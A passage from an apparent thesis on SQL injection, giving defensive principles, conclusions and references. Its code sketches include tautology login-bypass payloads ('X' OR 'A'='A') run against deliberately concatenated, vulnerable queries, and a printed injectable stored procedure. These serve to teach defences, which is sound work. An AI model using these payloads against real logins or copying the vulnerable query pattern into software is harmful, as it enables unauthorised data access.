the injected expression would be evaluated as a mere string. This result could be
easily achieved, for example, by means of a simple VBScript replace function
similar to this:
function escape(input)
    escape = replace(input, "'", "''")
end function
Even though this technique offers a lot of protection against character escaping,
by itself it is not enough to prevent code from being injected. For instance, single
quotes can be disguised in many ways, for example, using URL-encoding (%27).
In addition, there are many other techniques for concealing special characters
from being detected. This observation leads to a new idea. Wouldn’t it be nice,
instead of building a SQL statement at runtime, to have some sort of
template query containing entrypoints for the runtime values? Such an approach
could reduce the risk of exploitation of the string concatenation procedure
necessary for producing a dynamic query. This leads to the second
principle.
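The effect of Principle I on the authentication query discussed earlier can be checked with a small experiment. The Python sketch below is a minimal illustration, assuming SQLite (via the standard sqlite3 module) as a stand-in RDBMS and an invented one-row `Users` table; the `escape` function mirrors the VBScript replace function and the other names are hypothetical.

```python
import sqlite3

def escape(value):
    """Python counterpart of the VBScript function: double every single quote."""
    return value.replace("'", "''")

def login_query(login, pwd, escape_input):
    """Build the concatenated login query, optionally applying Principle I."""
    if escape_input:
        login, pwd = escape(login), escape(pwd)
    return ("Select * From Users Where Login='" + login +
            "' and PWD='" + pwd + "'")

def make_db():
    """Throwaway database with a single illustrative account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Login TEXT, PWD TEXT)")
    conn.execute("INSERT INTO Users VALUES ('levi', 'secret')")
    return conn

if __name__ == "__main__":
    conn = make_db()
    injected = "X' OR 'A'='A"
    # Without escaping, the WHERE clause is always true and every row is returned.
    print(conn.execute(login_query(injected, injected, False)).fetchall())
    # With escaping, the whole expression is compared as one literal string.
    print(conn.execute(login_query(injected, injected, True)).fetchall())
    print(escape("LEVI'S"))
```

As the text notes, this is only a first layer: the quoting rules depend on the RDBMS, and escaping does nothing for values that are not enclosed in quotes, such as numeric parameters.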

PRINCIPLE II
PREPARED STATEMENTS OR STORED PROCEDURES CAN OFFER AN EXTRA LAYER OF PROTECTION
References in the literature regarding the benefits of prepared statements and
Stored Procedures are common (Anley 2002a;Anley 2002b;Boyd & Keromytis
2004;Cerrudo 2002;Halfond & Orso 2005a;Landsmann & Strömberg
2003;Yuhanna 2003;Yuhanna & Schwaber 2004).
The PREPARE statement feature is supported by many databases and it allows a
template SQL query to be pre-issued at the beginning of a session. For the actual
queries, only the variables that change need to be specified. Stored Procedures are
composed of a set of SQL statements that are stored under a procedure name
in the RDBMS so that the statements can be executed as a group by the
database server. Some RDBMSs, such as Microsoft and Sybase SQL Server,
precompile Stored Procedures so that they execute more rapidly. Although the
PREPARE feature was introduced as a performance optimization and Stored
Procedures for functional abstraction, they can address SQL Injection attacks if the
same query is issued many times (Boyd & Keromytis 2004). Let’s consider the user
authentication sample query used previously, but this time implemented using a
parameterized approach, in this example using VB.NET and ADO.NET:
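' myCommand is assumed to be a SqlCommand (System.Data.SqlClient) created elsewhere.
myCommand.CommandText = "Select * from Users Where " & _
"Login=@Login and PWD=@PWD"
Dim Login As New SqlParameter("@Login", SqlDbType.VarChar)
Dim PWD As New SqlParameter("@PWD", SqlDbType.VarChar)
' User input is assigned as parameter values, never concatenated into the query text.
Login.Value = "<user_malicious_input>"
PWD.Value = "<user_malicious_input>"
myCommand.Parameters.Add(Login)
myCommand.Parameters.Add(PWD)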

Understanding this piece of code requires some explanation for those not
acquainted with ADO.NET. The database query is represented by what is known as a
Command object which, amongst other properties, possesses the CommandText
property used for specifying the query statement. In this case, the query is not a
dynamically generated query, but a static query with dynamic parameters. The
user inputs for Login and Password are now represented as input parameters
named @Login and @PWD [14]. The runtime values, whatever they are, will
then be inserted and treated as parameters of the base static query. If a user tries
to inject some malicious input, it will be virtually (if not completely) impossible to
escape the base query and inject additional statements.
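The same behaviour can be observed outside ADO.NET. The following Python sketch is an illustration only, assuming SQLite (standard sqlite3 module) as a stand-in database and an invented `Users` table that mirrors the example query; `authenticate` and `make_db` are hypothetical names. The query text is static and the runtime values are passed separately as named parameters.

```python
import sqlite3

def make_db():
    """Throwaway database; the plain-text PWD column only mirrors the example query."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Login TEXT, PWD TEXT)")
    conn.execute("INSERT INTO Users VALUES ('levi', 'secret')")
    return conn

def authenticate(conn, login, pwd):
    """Static query text; the runtime values travel separately as parameters."""
    row = conn.execute(
        "SELECT COUNT(*) FROM Users WHERE Login = :login AND PWD = :pwd",
        {"login": login, "pwd": pwd}).fetchone()
    return row[0] > 0

if __name__ == "__main__":
    conn = make_db()
    print(authenticate(conn, "levi", "secret"))              # valid credentials
    print(authenticate(conn, "X' OR 'A'='A", "X' OR 'A'='A"))  # treated as plain text
```

Because the injected expression is bound as a value, it is compared against the stored login as an ordinary string and the structure of the WHERE clause cannot change.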
It seems that this principle completely solves the problem, yet, the same sources
that speak about the benefits of Prepared Statements and Stored Procedures also
indicate that many developers and sysadmins may have a false sense of security
because they trust Stored Procedures make them invulnerable to SQL Injection
attacks. Reality is a bit harsher as one can use Stored Procedures and still be prone
to an injection attack. At the end of the day, it always depends on how the actual
implementation works. For example, the 'sp_msdropretry' system Stored
Procedure, which is accessible to the Public database role by default, allows SQL
Injection. Its inner implementation is as follows:
CREATE PROCEDURE sp_MSdropretry (@tname sysname, @pname sysname)
as
declare @retcode int
-- each DROP statement is built by concatenating a caller-supplied parameter
exec ('drop table ' + @tname)
if @@ERROR <> 0 return(1)
exec ('drop procedure ' + @pname)
if @@ERROR <> 0 return(1)
return (0)
GO
14 The @VarName syntax employed in this example is from the Transact-SQL dialect used by
MS SQL Server in order to reference variables as part of a statement.
Because the queries in the Stored Procedure are built by concatenation, the EXEC
statement could be exploited into executing other procedures. Any stored
procedure that uses the EXEC statement to execute a query string containing
user-supplied data should be carefully audited for SQL Injection (Anley 2002a).
In summary, PREPARED statements do provide an effective defence if, and only if,
all user input is treated as parameters. On the other hand, this defence
mechanism can be defeated if the base query references Stored Procedures
that use string concatenation for implementing dynamic queries, instead of using
a parameterized approach as well. Any query string that is composed on-the-fly is
potentially vulnerable to SQL Injection (Anley 2002a).
>
PRINCIPLE III
ALL INPUT IS EVIL! ALWAYS EVALUATE ALL INPUT BEARING SQL INJECTION IN MIND
According to Anley (2002a), the use of an «ADODB.Command object (or similar) to access
parameterised stored procedures appears to be immune to SQL Injection. That
does not mean that no one will be able to come up with a way of injecting SQL
into an application coded this way. It is extremely dangerous to place your faith in
a single defence; best practice is therefore to always validate all input with SQL
Injection in mind». This makes absolute sense, as it is safe to say that most security
exploits are only possible due to lack of proper input validation from the target
application (Boyd & Keromytis 2004; Howard & LeBlanc 2003; Huang et al. 2003).
Bearing this in mind, Howard & LeBlanc (2003) propose an interesting rule of
thumb. They say that «data must be validated as it crosses the boundary between
untrusted and trusted environments».
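The contrast between a query string composed on-the-fly and a parameterised one can be
illustrated with a minimal sketch. It is not taken from the cited sources: it assumes
Python with the standard sqlite3 module standing in for the RDBMS, and the table, the
function names and the payload are hypothetical.

```python
import sqlite3


def find_user_concatenated(conn, name):
    # VULNERABLE (for illustration only): the input becomes part of the SQL text.
    query = "SELECT name FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def find_user_parameterized(conn, name):
    # The input is bound as a value and is never parsed as SQL.
    query = "SELECT name FROM users WHERE name = ?"
    return conn.execute(query, (name,)).fetchall()


def demo():
    # Hypothetical in-memory table with two rows.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?)", [("alice",), ("bob",)])
    payload = "nobody' OR '1'='1"  # classic tautology payload
    leaked = find_user_concatenated(conn, payload)
    safe = find_user_parameterized(conn, payload)
    conn.close()
    return leaked, safe
```

With the concatenated version the payload rewrites the WHERE clause and every row is
returned, whereas the parameterised version looks for a user literally named after the
payload and finds none. In line with the quotation above, this should be read as one
layer of defence and not as a substitute for validating the input.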
Figure 38 - The Concept of a Trust Boundary and Chokepoints
> adapted from (Howard & LeBlanc 2003) <
[Figure 38 labels: Trust Boundary; Chokepoint (three); Service; Environment Variable;
Config Data; Service Data; "trust each other"]
This rule implies the definition of a boundary and of what data is inside and outside
that scope. According to the authors, trusted data is data that we, or an entity we
explicitly trust, have complete control over; untrusted data therefore refers to
everything else, for example user input. A corollary of this statement is
that the data that services the application stands within the trusted zone
boundary, which partially explains why SQL Injection can be so pernicious. On the
other hand, this trust can only be exploited by external data sources standing outside
the boundary. Howard & LeBlanc (2003) also propose a strategy for defending
against input attacks. If exploitation can only come from external data sources
such as user input, then chokepoints at the trust border crossing could minimize
the chances for exploitation while providing for better control of the runtime
interactions. Using a multi-channel approach, where each type of external source
is forced to use its own inbound chokepoint, will reduce the risk of a cascade
attack and build functionality on top of tested and proven exchange mechanisms.
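The multi-channel chokepoint idea can be sketched as follows. This is only an
illustration under stated assumptions, not Howard & LeBlanc's implementation: the
channel names, the validation rules and the function names are all hypothetical, and
Python is used merely as a convenient notation.

```python
import re

# Hypothetical whitelist rules: each external channel gets its own validator.
_USERNAME = re.compile(r"[A-Za-z0-9_]{1,32}")
_ORDER_ID = re.compile(r"[0-9]{1,9}")


def check_username(raw):
    # Accept only a short run of letters, digits and underscores.
    if not isinstance(raw, str) or _USERNAME.fullmatch(raw) is None:
        raise ValueError("input rejected at the username chokepoint")
    return raw


def check_order_id(raw):
    # Accept only plain decimal digits and hand back a real integer.
    if not isinstance(raw, str) or _ORDER_ID.fullmatch(raw) is None:
        raise ValueError("input rejected at the order id chokepoint")
    return int(raw)


# One inbound chokepoint per type of external source (assumed channel names).
CHOKEPOINTS = {
    "form.username": check_username,
    "query.order_id": check_order_id,
}


def cross_boundary(channel, raw):
    # Data without a registered chokepoint never enters the trusted zone.
    validator = CHOKEPOINTS.get(channel)
    if validator is None:
        raise ValueError("no chokepoint registered for channel " + repr(channel))
    return validator(raw)
```

Rejecting anything that does not match a known-good pattern, rather than trying to
strip out known-bad characters, is a design choice of this sketch; a real system would
derive the rules from its own data model.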
>
PRINCIPLE IV
THE LEAST-PRIVILEGE PRINCIPLE
This principle has been mentioned before, as it is almost impossible to discuss
security in Information Systems without referring to it.
Jerry H. Saltzer & Mike D. Schroeder (1975) were the first to systemize this idea,
which arose during the 1970s, by stating that «every program and every user of
the system should operate using the least set of privileges necessary to complete
the job». The underlying idea is to grant just the minimum privileges needed to
permit a legitimate action, in order to enhance protection of data and
functionality from faults (fault tolerance) and malicious behaviour. It sounds
simple, but it carries with it a whole range of other subjects. For instance, it
implies the existence of Access Control¹⁵, which in turn implies the existence of
authentication, and so forth. Had this principle been put in place in the
«Real Environment Test» shown in the Experimenting chapter, accessing the file
system to create a text file via the RDBMS would not have been possible.
Reducing the options for a cascade attack is always a good principle.
15 The enforcement of specified authorization rules based on positive identification of
users and the systems or data they are permitted to access.
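The effect of the least-privilege principle can be illustrated with a small sketch. It
assumes Python's standard sqlite3 module, whose read-only open mode is used here as a
stand-in for a database login that has been granted SELECT rights only; the file, table
and function names are hypothetical.

```python
import pathlib
import sqlite3
import tempfile


def demo():
    with tempfile.TemporaryDirectory() as folder:
        path = pathlib.Path(folder) / "shop.db"

        # A privileged connection, used only to set up the hypothetical schema.
        owner = sqlite3.connect(str(path))
        owner.execute("CREATE TABLE orders (id INTEGER, total REAL)")
        owner.execute("INSERT INTO orders VALUES (1, 9.5)")
        owner.commit()
        owner.close()

        # The application opens the same database with read-only rights.
        reader = sqlite3.connect(path.as_uri() + "?mode=ro", uri=True)
        try:
            rows = reader.execute("SELECT id, total FROM orders").fetchall()
            try:
                # What an injected statement might attempt.
                reader.execute("DROP TABLE orders")
                write_blocked = False
            except sqlite3.OperationalError:
                write_blocked = True
        finally:
            reader.close()
    return rows, write_blocked
```

Even if an attacker manages to inject a destructive statement, a connection that was
never allowed to write cannot execute it; the legitimate read still works.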

>
PRINCIPLE V
MASK ERROR MESSAGES
Error messages are a good source of information and can prove to be a
valuable asset when exploiting a system (Anley 2002a; Anley 2002b; Boyd &
Keromytis 2004; Buehrer, Weide, & Sivilotti 2005; Cerrudo 2002; Huang et al.
2003; Kost 2003; Landsmann & Strömberg 2003; Maor & Shulman 2003; Maor &
Shulman 2004; McDonald 2002; Racciatti 2002; Sam M.S. 2005; SecuriTeam.com
2002; Spett 2002). This was neatly demonstrated in the Experimenting chapter;
hence, masking them will increase the overall level of security.
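One possible way of masking error messages is sketched below. It assumes Python with
the standard sqlite3 and logging modules; the logger name, the generic message and the
function names are hypothetical and are not taken from any of the cited sources.

```python
import logging
import sqlite3

log = logging.getLogger("app.db")  # hypothetical logger name

# The only text a remote user ever sees when a query fails.
GENERIC_ERROR = "The request could not be processed."


def run_query(conn, sql, params=()):
    try:
        return True, conn.execute(sql, params).fetchall()
    except sqlite3.Error as exc:
        # Full detail stays on the server side, for the administrators.
        log.error("database error: %s", exc)
        # The caller receives a message with no table names or SQL fragments.
        return False, GENERIC_ERROR


def demo():
    conn = sqlite3.connect(":memory:")
    ok, body = run_query(conn, "SELECT * FROM no_such_table")
    conn.close()
    return ok, body
```

The detailed error remains available for diagnosis in the server log, while the
attacker loses the feedback channel that error-based injection relies on.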
>
PRINCIPLE VI
DO NOT THINK OF IT INFRASTRUCTURE AS COMMODITY: HARDENING AND PATCHING ARE AS
IMPORTANT AS ALL OF THE APPLICATION-LEVEL SECURITY STRATEGIES
Because the skill sets of infrastructure management and application development are
so different, developers tend not to think of IT infrastructure as something they
should care about, but as something that is there to serve their purposes. The
problem is that an application rarely stands on its own or is built entirely from
scratch. For example, a Web application depends on the existence of a Web server
and, quite often, on some kind of application framework such as ASP.NET, JSP,
etc. While it is true that the application is the primary target of the injection
attack, the surrounding environment is what enables the attack to be perpetrated.
Reducing the number of hijackable services and known vulnerabilities is highly desirable.
>
PRINCIPLE VII
PATCH THE DEVELOPER/DBA GAP
This principle pretty much summarizes all of the previous principles at a high level.
The success of SQL Injection is in great measure tied to developers
not thinking as DBAs, and to DBAs regarding development as something
completely alien to their job description. Patching this gap can be the best remedy.

Chapter 7
CONCLUSIONS
Knowledge creation is achieved through recognition of the
synergistic relationship between tacit and explicit
knowledge in the organization, and through the design of
social processes that create new knowledge by
converting tacit knowledge into explicit knowledge.
This final chapter is primarily a wrap-up summary of the findings yielded by this
research effort. It presents a final argument of the results and of what this work
accomplished in terms of bridging the gap between different bodies of Knowledge.
In addition to presenting a reflective perspective of this work’s contributions, an
evolutionary vision is offered by combining the implications of the results with
the underlying limitations of the research toward the formulation of additional
follow-up research in this field.

conclusions •
INTRODUCTION
Conclusions
INTRODUCTION
Regarding the production and usage of Knowledge within organizations, Choo (1996)
states that «knowledge creation is achieved through a recognition of the synergistic
relationship between tacit and explicit knowledge in the organization, and through the
design of social processes that create new knowledge by converting tacit knowledge into
explicit knowledge». Choo upholds the model proposed by Nonaka & Takeuchi (1995)
regarding how organizations create Knowledge. This model defines tacit knowledge as
being personal in nature, and therefore hard to formalize and transmit to others. In
contrast, explicit knowledge is formal in nature and well suited to transmission across
people and groups. According to this model, the knowledge lifecycle encompasses four
modes: socialization, externalization, combination, and internalization.
Figure 39 - The Knowledge Creation Cycle
> adapted from (Choo 1996) <

Whereas socialization is the process of acquiring tacit knowledge through sharing
experiences, externalization resorts to metaphors, analogies, and models to convert tacit
knowledge into explicit knowledge. Externalization is commonly used during the creation
phase of new product development (Choo 1996). According to the same source,
combination aims at creating explicit knowledge by incorporating other sources of
explicit knowledge.
This research is a blend of externalization and combination. A deductive approach using
experimentation was the primary means of producing knowledge. This knowledge
was then systemized using analogies and models (see the «Survey of Existing
Techniques» section of the Attack Taxonomy chapter) in order to convert Knowledge
residing in the tacit realm into scientific Knowledge, organized in a systematic way. This
predilection for analogies and models as tools for formulating new Knowledge can in
great measure be explained by the analogy of creating a new product, which is known to
rely heavily on externalization. Indeed, creating a new product is exactly what this work
sets out as its prime objective: proposing the very first taxonomy of SQL Injection attacks
(see the «Taxonomy Formulation» section of the Attack Taxonomy chapter). Additionally,
as established during the critical literature review (chapter Literature Review), the
research topic is still rather obscure, scattered across hacking and underground sources in
an ad-hoc fashion. If the infinite variations of SQL Injection attacks are added to this
fact, then analogies and models seem to be probably the only feasible way of systemizing
this body of Knowledge.
With the purpose of building internal validity, this work resorted to the combination of
supplementary sources that could offer additional insight on the subject, including
academic, underground and industry sources. Though answering the research question
looks pretty straightforward, addressable by experimentation, the hard work lies beneath.

Answering any research question requires a solid basis of explicit Knowledge, but in
the current context this basis is far from solid. For this reason, this work had to build the
necessary theoretical basis and articulate it with the practical means available. This
was achieved by surveying existing SQL Injection techniques and then formulating a
structure in the form of a taxonomy. Hence, the added value of this research does not lie
directly in the research question, but in the underlying steps of the research. The scope
of this study is therefore rather wide, as it begins by formulating a theoretical framework
and goes all the way up to experimenting with the findings, thus building additional
internal validity (see chapter Experimenting). Moreover, since one of the objectives of this
work is to expose the SQL Injection threat and educate IT professionals, this study also
includes a set of preventive tactics (see chapter Defensive Tactics) that could help
developers, sysadmins and other researchers to reduce, and hopefully completely
eliminate, the SQL Injection threat.

DISCUSSION OF RESULTS
Due to the wide scope of this research, numerous results were obtained on several fronts,
providing a multi-vector approach into the research topic. Somewhat surprisingly, the
first conclusion is that SQL Injection is a lot more than a pure technology-related topic.
Figure 40 - The Height of People, Processes, Policies and Technology in SQL Injection
[Figure 40 labels]
People: Roles and Responsibilities; People Management; Skills Management
Processes: Design and Modeling; Compliance; Continuous Improvement
Policies: Automation; Standardization; Governance; Templates
Technology: IT, tools
Factors: Organizational; Methodological; Technological
Business Challenges remain the same
Business Problems remain the same

This conclusion was drawn from observing the evolutionary path organizations
underwent during the period in which SQL Injection emerged. The “I” for Information in
corporate IT did not include people. Nowadays many argue that computer systems only deal
with data, which can only be converted into information by a sentient being through
interpretation. Currently only humans fit this definition. Regardless of whether computer
systems deal with data or information, one thing is sure: humans are definitely part of
the Information System; in fact, they are the primary, if not ultimately the only, reason
for an Information System to exist. War broke out between technologists and people from
the business side as organizations strove to increase the empowerment of their
employees. But opening technology to people implied letting go of what technologists
defended the most: formality. Human-related systems, e.g. decision support systems, are
by definition very much informal, whereas core business applications, e.g. ERPs or a
banking Mainframe, are still highly formal. Still, even the most formal systems currently
depend on informal systems to receive and deliver data. A good example is the core
banking line of business application: a very strict and formal system that almost nobody
is allowed to touch, often residing in a bunker, is nowadays indirectly exposed on the
internet, allowing customers to perform financial transactions from home. Like an iceberg
whose tip is only a small fraction of its real size, an issue that looks purely technical
often turns out to be far more complex, as the biggest ballast is kept out
of sight under the waterline. SQL Injection is no exception. Many tried to find a quick fix
to the problem using technology alone and failed (see the «Technology-Based» section of
the Defensive Tactics chapter). Others blamed developers, the people side of the
Information System, as being solely responsible for the threat. There are others who
point out rapid development cycles, the processes piece, and the lack of standardization,
the policies part, as causes for SQL Injection. These viewpoints do offer a glimpse into the
topic, but they have all failed to provide a solution to the problem, as it still persists.

The second conclusion derives from the first. The SQL Injection threat is yet to be solved,
although there are some countermeasures available. Yes, there are some technology
countermeasures that are very effective, e.g. the failsafes in the Microsoft .NET
Framework 2.0. Yes, training people and making them aware of the problem will
significantly reduce the risk. Yes, more controlled development cycles with proper quality
assurance can be an asset in mitigating risks and yes, policies such as standardization and
templates can also lend a hand. Still, the harsh reality remains. The problem is still here,
maybe more controlled, but still present.
This chain of conclusions leads to the third conclusion of this work. If an effective solution
is ever to be found, it must unify technology, people, processes, and policies, while
accounting for the business problems and challenges organizations are faced with. This is
no simple endeavour, and for the time being the best means of unifying these factors is
through the use of principles. Principles can incorporate elements of all natures or
target a specific factor or issue. The good thing, though, is that principles allow building
depth, in that a top-level principle can reference other principles that address
specific sets of issues. A comprehensive set of first-line-of-defence principles, following
a logic where 20% of the effort reduces 80% of the risk, has been formulated and compiled
in the «Principle-Based» section of the Defensive Tactics chapter.
The fourth and last conclusion is that the research question «Can the weakness of modern
e-Business systems be demonstrated by proving SQL Injection techniques to be effective
in obtaining and altering private business data?» was answerable, and the response is
affirmative as per the Experimenting chapter. All the code samples presented throughout
this work, as well as the attack perpetrated as the basis for addressing the research
question, could have been rendered ineffective had the principles proposed in this work
been put into action.

CONTRIBUTIONS OF THIS WORK
One of the early goals of this work was to build new scientific Knowledge and empower
others to continue developing new means of defence, but also to expose the threat in a
systemized way in order to benefit the global IT community. The following list
summarizes the main contributions of this work to science and to the IT community:
• Exposes the SQL Injection threat using a comprehensive approach;
• Presents a global view of the root causes of SQL Injection, centring the topic
on organizations instead of treating it as a pure technology issue;
• Builds explicit Knowledge through the use of an extensive set of examples
and code samples that encompass a wide scope of scenarios and systems
under threat;
• Proposes the first unifying definition of SQL Injection;
• Proposes the first taxonomy of SQL Injection attacks;
• By structuring the different types of attacks in a taxonomy, it empowers
others in the quest for fully understanding the topic, toward the
development of a widespread remedy yet to be accomplished;
• Compiles a rich set of principles that could be used as defensive tactics
against SQL Injection at the present date.

IMPLICATIONS
If there is one direct implication that can be drawn from this work, it is a
Call-To-Action urging developers, sysadmins, analysts, researchers and, in general,
anyone who deals with databases as part of their professional life. New safeguards have
to be developed and put in place, developers have to become aware of the threat
and start coding defensively, organizations have to find the right balance between
time-to-market and quality assurance, and most of all, behaviours have to change
significantly.
Another direct implication of this work’s findings is that any attempt to remedy the
threat that centers itself on technology alone, or people, or any of the remaining factors
is doomed to fail. SQL Injection requires a unifying approach in order to be properly
addressed.
Finally, there is much to accomplish in the field of researching for a solution. Up till now,
the threat itself had not been structured, thus making additional research more difficult.
With a taxonomy to start with, others can more easily build new Knowledge in the field
of prevention, while IT professionals can start minimizing risks from their end.

LIMITATIONS OF THIS WORK
The infinite variations of SQL Injection attacks constitute a limitation to any work on the
subject. The success of logical attacks is largely dependent on the countless runtime
interactions of different application components, making it almost impossible to predict
the true behaviour of the application, especially for large complex systems. Inevitably, all
the samples, examples, and scenarios presented are a mere shadow of a broader
reality and were designed to imprint a viewpoint on the reader’s mind. Therefore, there is
still plenty of room for other researchers to add to our common Knowledge of SQL Injection
by presenting their unique insight into the topic.
Another limitation of this work is that it performed little experimentation, as the research
question did not require multiple test subjects. Additional experimentation would serve
to solidify the taxonomy and bring additional insight about the true repercussions of SQL
Injection.
Finally, this work is all about exposing and not preventing, though a first line of defensive
tactics was included in a dedicated chapter. Hence, a comprehensive guide to existing
countermeasures against SQL Injection attacks was not presented.

FURTHER INVESTIGATION
Further investigation could be formulated from the implications and the limitations of
this work. Without giving it too much thought, probably the vastest field for research
around the SQL Injection topic lies in prevention. Still, SQL Injection is just
one among many types of logical attacks nowadays threatening distributed applications.
The following list is a suggestion of additional research that would relate directly to the
Knowledge produced by this work:
• Additional surveys of the existing SQL Injection variations and scope of
attack;
• Additional analysis of patterns in behaviours that could indicate the presence
of a SQL Injection attack in order to enrich the databases of application-level
firewalls and intrusion detection systems;
• Further experimentation on additional e-Business platforms in order to
validate the proposed taxonomy;
• Assessing the impact of code injection attacks on an increasingly complex
mesh of Web services connecting organizations across security boundaries
on a global scale;
• Compilation of a comprehensive survey of existing principles that could be
used to harmonize the business challenges and problems with the formality
required to minimize injection attacks.

REFERENCES
Introduction to Databases for web developers. 2006.
http://www.extropia.com/tutorials/sql/toc.html.
eXtropia - the open Web technology company.
A.Race, S. 2003, eCo II / Business Services Registry
Workshop: Final Report.
Álvarez, G. & Petrovic, S. 2003, "A new taxonomy of
web attacks suitable for efficient encoding", Computers
and Security, vol. 22, no. 5, pp. 435-449.
Anley, C. 2002b, Advanced SQL Injection, NGSSoftware
Insight Security Research (NISR),
http://www.nextgenss.com/papers/advanced_sql_injection.pdf.
Anley, C. 2002a, (more) Advanced SQL Injection,
NGSSoftware Insight Security Research (NISR),
http://www.nextgenss.com/papers/more_advanced_sql_injection.pdf.
ANSI/IEEE 1471. IEEE Recommended practice for
architectural description of software-intensive
systems. 2000. IEEE.
Avison, D. E., Lau, F., Myers, M. D., & Nielsen, P. A.
Action research. 42[1], 94-97. 1999. ACM Press.
Communications of the ACM.
Barry, D. K. 2003, Web Services and Service-Oriented
Architectures: The Savvy Manager's Guide Morgan
Kaufmann Publishers.
Baskerville, R. L. "Action Research For Information
Systems", in Fifth Americas Conference on Information
Systems, Association for Information Systems.
Bell, J. 1999, Doing Your Research Project: A Guide for
First-Time Researchers in Education and Social Science,
Third Edition edn.

Blake, W. 2003, A "Black Box" Audit of a Microsoft
.NET web-based application - An External Auditor's
Perspective, SANS Institute.
Boyd, S. W. & Keromytis, A. D. "SQLrand: Preventing
SQL Injection Attacks", pp. 292-302.
Buehrer, G. T., Weide, B. W., & Sivilotti, P. A. G.
"Using parse tree validation to prevent SQL injection
attacks", in 5th international workshop on Software
engineering and middleware, ACM Press, pp. 106-113.
Calladine, J. 2004, "Giving legs to the legacy — Web
Services integration within the enterprise", BT
Technology Journal, vol. 22, no. 1.
Carnegie Mellon University Software Engineering
Institute. Glossary at Carnegie Mellon University
Software Engineering Institute. 2006.
http://www.sei.cmu.edu/opensystems/glossary.html.
2006.
Cerrudo, C. 2002, Manipulating Microsoft SQL Server
Using SQL Injection, Application Security, Inc.,
http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf.
Chakrabarti, S. 2003, Mining The Web: Discovering
Knowledge From Hypertext Data Morgan Kaufmann
Publishers.
Choo, C. 1996, "The Knowing Organization: How
Organizations Use Information to Construct Meaning,
Create Knowledge, and Make Decisions", International
Journal of Information Management, vol. 16, no. 5, pp.
329-340.
Cormack, D. 1991, The Research Process in Nursing,
4th Edition edn, Blackwell Publishing.
Dawson, C. 1999, Practical Research Methods How To
Books, Ltd.
Encyclopædia Britannica. Information Processing.
2006. http://search.eb.com/eb/article-61668.
Encyclopædia Britannica Online.
Endrei, M., Ang, J., Arsanjani, A., Chua, S., Comte, P.,
Krogdahl, P., Luo, M., & Newling, T. 2004, Patterns:
Service-Oriented Architecture and Web Services, 1st
Edition edn, IBM.
Erl, T. 2004, Service-Oriented Architecture: A Field
Guide to Integrating XML and Web Services Prentice
Hall PTR.
Finnigan, P. 2002, SQL Injection and Oracle
http://www.securityfocus.com/infocus/1644.
Gabriela Barrantes, E., H.Ackley, D., & Forrest, S.
Randomized instruction set emulation to Disrupt
Binary Code Injection Attacks. 8[1], 3-40. 2005. ACM
Press. ACM Transactions on Information and System
Security (TISSEC).
Gartner Group 2002, Gartner Dataquest Alert, The
Gartner Group.
Gartner Group 2003, Gartner Dataquest Alert, The
Gartner Group.
Gartner Group 2004, Gartner Web Services Magic
Quadrant, Gartner Group.
Gaurav, S. K., Angelos, D. K., & Vassilis, P.
"Countering Code-Injection Attacks With Instruction-
Set Randomization", in Conference on Computer and
communications security, ACM Press, pp. 272-280.
Gephart, R. P. U. o. A. 1999a, Paradigms and Research,
Research Methods Forum,
http://www.aom.pace.edu/rmd/1999_RMD_Forum_Paradigms_and_Research_Methods, 52.
Gephart, R. Paradigms and Research Methods. 1999b.
http://www.aom.pace.edu/rmd/1999_RMD_Forum_Paradigms_and_Research_Methods.htm, University of
Alberta. 2006b.
Gollmann, D. 2006, Computer Security, Second Edition
edn, John Wiley & Sons.

Halfond, W. G. J. & Orso, A. "AMNESIA: Analysis and
Monitoring for NEutralizing SQLInjection Attacks", in
20th IEEE/ACM international Conference on Automated
software engineering, ACM Press, pp. 174-183.
Halfond, W. G. J. & Orso, A. "Combining Static
Analysis and Runtime Monitoring to Counter
SQLInjection Attacks", in Third international workshop
on Dynamic analysis, ACM Press New York, NY, USA,
pp. 1-7.
Hancock, B. 1998, An Introduction to Qualitative
Research, University of Nottingham,
http://faculty.uccb.ns.ca/pmacintyre/course_pages/MBA603/MBA603_files/IntroQualitativeResearch.pdf#search=%22%22An%20Introduction%20to%20Qualitative%20Research%22%20Hancock%22.
Hansman, S. 2002, A Taxonomy of Network and
Computer Attack Methodologies, Honours thesis,
University of Canterbury.
Hek et al. 2000, "Systematically searching and
reviewing literature", Nurse Researcher, vol. 7, no. 3,
pp. 40-57.
Howard, M. & LeBlanc, D. 2003, Writing Secure Code,
Second Edition edn, Microsoft Press.
Huang, Y.-W., Huang, S.-K., Lin, T.-P., & Tsai, C.-H.
"Securing Web Application Code by Static Analysis and
Runtime Protection", in International World Wide Web
Conference, ACM Press, pp. 40-52.
Huang, Y.-W., Huang, S.-K., Lin, T.-P., & Tsai, C.-H.
"Web application security assessment by fault injection
and behavior monitoring", in International World Wide
Web Conference, ACM Press New York, pp. 148-159.
Human Engineering. Definitions from Human
Engineering. 1998.
http://www.manningaffordability.com/s&tweb/HEResource/Other/Definitions.htm. 2006.
Hutchinson, S. 2004, Foundations for research –
Methods of inquiry in education and the social sciences
Lawrence Erlbaum associates, London.
Huth EJ. How to Write and Publish Papers in Medical
Sciences. 1982. 64, Philadelphia: ISI Press.
IBM. Autonomic Computing. 2005.
http://www.research.ibm.com/autonomic/.
IEEE 1220. IEEE Standard for Application and
Management of the Systems Engineering Process.
1998. IEEE.
Institute of Education Sciences (IES). Glossary at
National Center for Education Statistics. 2006.
http://nces.ed.gov/pubs98/tech/glossary.asp.
Jari A.Lehto & Pentti Marttiin "Experiences in System
Architecture Evaluation: A Communication View for
Architectural Design", in HICSS '05. 38th Annual Hawaii
International Conference on System Sciences, IEEE, p.
312c.
Joshi, J., Aref, W., Ghafoor, A., & Spafford, E. Security
Models for Web-Based Applications. 44[2], 38-44.
2001. ACM Press. Communications of the ACM.
Kenneth W.Borland Jr. 2001, "New directions for
institutional research", New Directions for Institutional
Research, vol. 112, pp. 5-13.
Kost, S. 2003, An Introduction to SQL Injection Attacks
for Oracle Developers, Integrigy Corporation,
http://www.net-security.org/dl/articles/IntegrigyIntrotoSQLInjectionAttacks.pdf.
Kunene, G. 2003, The Database Holds Your Core
Assets—Protect It First.
Landsmann, U. B.-A. & Strömberg, D. 2003, Web
Application Security: A Survey of Prevention Techniques
Against SQL Injection, Research Thesis, Stockholm
University; University of California.

